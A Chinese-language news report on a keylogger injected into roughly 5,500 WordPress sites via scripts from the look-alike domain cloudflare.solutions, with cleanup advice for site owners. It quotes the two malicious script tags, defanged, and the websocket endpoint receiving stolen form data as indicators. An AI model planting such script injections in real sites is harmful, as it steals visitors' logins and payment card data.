首页 网上兼职 5500 个 WordPress 网站发现按键记录器

5500 个 WordPress 网站发现按键记录器

据最新消息,约有5500个WordPress网站被发现感染了一个记录键盘点击的恶意脚本,有时候还会加载运行在浏览器上的挖矿程序。

此恶意脚本加载自域名“cloudflare.solutions”,但该域名与云计算服务商Cloudflare无关,只要用户从输入字段切换,就会记录用户在表单字段中输入的内容。

该脚本同时加载到网站的前端和后端,这就意味着它能用于窃取管理员登录凭证和WP电子商务网站的信用卡数据。

根据网站源代码搜索引擎PublicWWW,有5496个WordPress网站运行了该按键记录程序,而且攻击者从四月份就开始了。

已知加载键盘记录的两个恶意脚本:<scripttype=’text/javascript’src=’hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js’></script><scripttype=’text/javascript’src=’hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js’></script>被盗数据被发送到wss://cloudflare[.]solutions:8085端口。

如恶意代码驻留在function.php文件中,你应该删除add_js_scripts函数和所有提到add_js_scripts的add_action语句。

考虑到这个恶意软件的键盘记录功能,你应该考虑所有的WordPress密码都被破坏了,所以下一个步骤是修改密码,此外别忘了检查你的网站是否有其他感染。

免责声明:

本站提供的信息来源网络,所有内容及软件的文章仅限用于学习和研究目的,不得将上述内容用于商业或者非法用途,如有侵权删除请致信E-mail:kefu1086999@qq.com

热门文章

发表评论

您的电子邮箱地址不会被公开。